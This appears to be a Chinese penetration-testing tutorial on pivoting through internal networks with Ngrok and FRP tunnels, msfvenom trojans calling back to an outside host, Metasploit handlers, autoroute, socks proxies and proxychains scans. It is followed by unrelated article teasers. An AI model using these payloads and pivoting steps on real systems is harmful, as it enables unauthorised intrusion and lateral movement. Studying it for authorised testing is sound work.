内网安全:Socks 代理 || 本地代理 技术.

news2025/2/13 12:58:11

内网安全:Socks 代理 || 本地代理 技术.

Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 代理 技术.

两个内网通讯上线( Ngrok )

(1)开通隧道:

(2)下载客户端:

(3)生成一个程序后门:

(4)进行监听:(kali)

两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

(2)生成程序后面:

(3)进行监听:(kali)

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(2)开启本地代理:

(3)内网扫描:

(4)浏览器访问:

第三层内网代理:

(1)生成正向程序后门:

(2)进行监听:

(3)信息收集及配置访问:

(4)开启本地代理:

第四层内网渗透:

(1)生成正向程序后门:

 (2)进行监听:


代理解决的问题:(1)内网有外网    (2)内网有过滤    (3)内网无外网

两个内网通讯上线( Ngrok )

开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)

(1)开通隧道:


(2)下载客户端:

解压放到 kali 中:(切换的刚刚下载的文件目录中)

(1)./sunny clientid 115735315695        // 执行 

    ./sunny clientid 隧道的IP


(3)生成一个程序后门:(木马)

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe


(4)进行监听:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.106        // 本地的 IP 地址

(5)set lport 4444                 // 本地的 端口.

(6)exploit


两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

需要有自己的服务器,有来搭建跳板.
【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677            // 这个端口修改为 服务器 开放的就行

启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677                 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 转发给本机的 5555
remote_port = 6000                 // 服务端用 6000 端口转发给本机

启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini

(2)生成程序后面:(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe


(3)进行监听:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set LHOST 127.0.0.1    

(5)set LPORT 5555        // 本机监听的端口【和控制端的一样】

(6)exploit

然后把程序后门(木马)放在目标主机上执行就行.

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.

或

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段


(2)开启本地代理:

background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a
(1)set srvport 2222        // 设置本地代理端口为2222

(2)exploit                 // 运行


(3)内网扫描:

打开 /etc/proxychains4.conf 文件:

socks4 192.168.0.106 2222                // 添加 本地的代理和端口

进行扫描:

proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.

-sT:扫描 TCP 数据包已建立的连接 connect


(4)浏览器访问:


第三层内网代理:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe


(2)进行监听:

要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.20.99                // 第二层内网的 IP 地址

(4)set lport 54321                     // 和程序后面(木马)一样的端口

(5)exploit


(3)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段.


(4)开启本地代理:

background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a

(1)set srvport 6666        // 默认端口6666

(2)exploit                 // 运行


第四层内网渗透:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe


 (2)进行监听:

要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.10.110                // 第二层内网的 IP 地址

(4)set lport 9876                     // 和程序后面(木马)一样的端口

(5)exploit

      

     

   

学习链接:第70天:内网安全-域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/639400.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Selenium中的隐式等待和显式等待

在Selenium中,“等待”在执行测试中起着重要作用。在本文中,您将学习Selenium中“隐式”和“显式”等待的各个方面。 在本文中,您将学习到 1. 为什么我们需要在selenium中等待? 2. 隐瞒等待 3. 明确等待 4. 流利的等待 为什么…

15.DIY可视化-拖拽设计1天搞定主流小程序-分类联动文章列表实时刷新

分类联动文章列表实时刷新 本教程均在第一节中项目启动下操作 分类联动文章列表实时刷新前言需求一:功能实现:点击首页分类,对应分类内容显示到当前页一、清空原分类界面:二. 设置选项卡三:设定展示内容字段:1.跨页面复制:文章分类组件到分类![在这里插入图片描述](https://img…

服务器安装cuda版本的pytorch+DGL

1、先创建pytorch环境:conda create -n ljj_torch112 python3.8 看本机的: 先看自己的cuda版本:(最权威的看:nvcc --version) 10.0的cuda于是不太符合,所以换一个10.2的cuda比较常用&#xff0…

【C++从入门到放弃】list深度剖析及模拟实现

🧑‍💻作者: 情话0.0 📝专栏:《C从入门到放弃》 👦个人简介:一名双非编程菜鸟,在这里分享自己的编程学习笔记,欢迎大家的指正与点赞,谢谢! list …

CANN黑科技解密|昇腾Ascend C编程语言 — 极简易用的算子开发体验

AI应用的大脑是神经网络,而构成神经网络的基石是一个个算子。为了让开发者的网络在昇腾硬件上高效运行,昇腾异构计算架构CANN(Compute Architecture for Neural Networks)提供了丰富的高性能算子库,包括神经网络库、线…

Python-opcua 编程(1)

任何一项新标准如果不能充分应用是不可能推广的,最近看了一些国外网站,发现类似OPC UA 的应用以及比较广泛了,而且有许多课程。相比之下,我国OPCUA 标准的普及工作仍然停留在概述的阶段,为此,我将逐步介绍一…

复习并发编程的基础知识(一)

时间长了,并发编程的基础知识总忘,来记录一下: 进程和线程 进程:资源分配的最小单元,什么是资源?CPU,内存,网卡等等 线程:进程中的一个实体,不能单独存在&…

七、DMSP/OLS、NPP/VIIRS等夜间灯光数据能源碳排放空间化——能源碳排放增长类型、增长率、总量增长等级分析

一、前言 前文对能源碳排放空间化后的分析角度做了一些介绍,其实无非就是能源碳排放增长类型、增长率等的计算,那么这里强调一下,这个时候不能用利用统计数据计算出来的能源碳排放数据进行计算,而是必须用反演的能源碳排放数据进行划定计算。 二、具体步骤 增长类型 (…

【Excel超实用快捷键!!!办公效率1000%up!up!up!】

目录索引 ctrle:提取数据:合并数据: 普通快捷键:ctrla:ctrlc:ctrlv:ctrlx:ctrlz:ctrly:ctrls:ctrlf: 文字格式快捷键:ctrl…

IMX6ULL裸机篇之SPI实验-SPI主控寄存器

一. SPI主控寄存器 IMX6ULL 芯片的 SPI接口叫做 ECSPI,支持全双工、主丛可配置。 本文学习 IMX6ULL-阿尔法开发板SPI中控芯片的 SPI寄存器部分。后续代码实现需要配置 SPI相关的寄存器。 二. SPI主控的寄存器配置 1. SPI主控芯片寄存器 (1) RXDATA寄存器&am…

DVWA-Command Injection

大约 命令注入攻击的目的是在易受攻击的应用程序中注入和执行攻击者指定的命令。 在这种情况下,执行不需要的系统命令的应用程序就像一个伪系统外壳,攻击者可能会使用它 作为任何授权的系统用户。但是,命令的执行权限和环境与 Web 服务具有的…

【MySQL】创建和管理表

创建和管理表 标识符命名规则MySQL中的数据类型创建和管理数据库使用数据库修改数据库 创建表语法方式一方式二 修改表向表中追加一个列修改一个列重命名一个列删除一个列 重命名表方式一方式2; 删除表清空表 存储数据是处理数据的第一步 。只有正确地把数据存储起来&#xff0…

基于卫星星历计算卫星在CGCS2000大地坐标系中的坐标

目录 一、北斗系统概述 1.空间星座 2.坐标系统 3.时间系统 二、实验目的 三、实验内容 四、实验过程 五、实验结果 一、北斗系统概述 1.空间星座 北斗卫星导航系统简称北斗系统,英文缩写为 BDS,其空间星座由 5 颗地球静止轨道(GEO&…

​“前端已死”甚嚣尘上,全栈工程师卷到起飞

海量应届生入场,坑位却还是那多。具备前后端开发能力的全栈工程师兴起,不仅能够开发前端,还能够处理后端业务逻辑和数据库等技术,还能掌握整个软件开发的细节。企业自然会更愿意招聘全栈工程师,说白了,卷啊…

springboot整合quartz实现定时任务动态增删改查

springboot整合quartz quartz介绍Quartz 核心概念 使用依赖配置文件启动类quartz工具类job业务用到的对象类接口service实现类测试 quartz介绍 Quartz是OpenSymphony开源组织在Job scheduling领域又一个开源项目,它可以与J2EE与J2SE应用程序相结合也可以单独使用。…

【CMake 入门与进阶(6)】 CMakeLists.txt 部分常用变量(附使用代码)

变量也是 cmake 中的一个重头戏,cmake 提供了很多内置变量,每一个变量都有它自己的含义,通过这个链接地址cmake-variables(7) — CMake 3.5.2 Documentation可以查询到所有的内置变量及其相应的介绍,如下所示: 在这一份…

App移动端测试 —— Monkey的日志

Monkey的日志对于分析脚本的执行情况十分必要。 Monkey 日志由以下几部分组成: 测试命令信息:随机种子 seed、运行次数、可运行应用列表、各事件百分比。” 正文内容从这里开始(可直接省略,亦可配图说明)。 01—Mon…

使用python批量处理工作簿和工作表

案例01 批量新建并保存工作簿 将for语句与xlwings模块相结合,就可以轻松实现批量创建工作簿 import xlwings as xw # 导入xlwings模块 app xw.App(visibleTrue,add_bookFalse) # 启动Excel程序,但不新建工作簿 for i in range(6):workbook app.books…

Pyinstaller 快速找出所需库的方法

目录 【auto-py-to-exe】第三方库 使用【auto-py-to-exe】逐步尝试 1.什么文件都不添加,选择项目与单目录后直接打包 2.直接运行生成的exe文件 3.定位所需的包 4.--add-data 和 --hidden-import 打包为一个exe文件 【auto-py-to-exe】第三方库 其是pyinstaller操…

【头歌-Python】9.1 X射线衍射曲线绘制(project)第3~4关

第3关:X 射线衍射曲线峰值 任务描述 本关任务:读文件中的数据绘制线图形并加绘制峰值。 相关知识 为了完成本关任务,你需要掌握: python 读取文件中的数据使用 matplotlib 绘制图形 python 读取文件 python读取文件可以用以…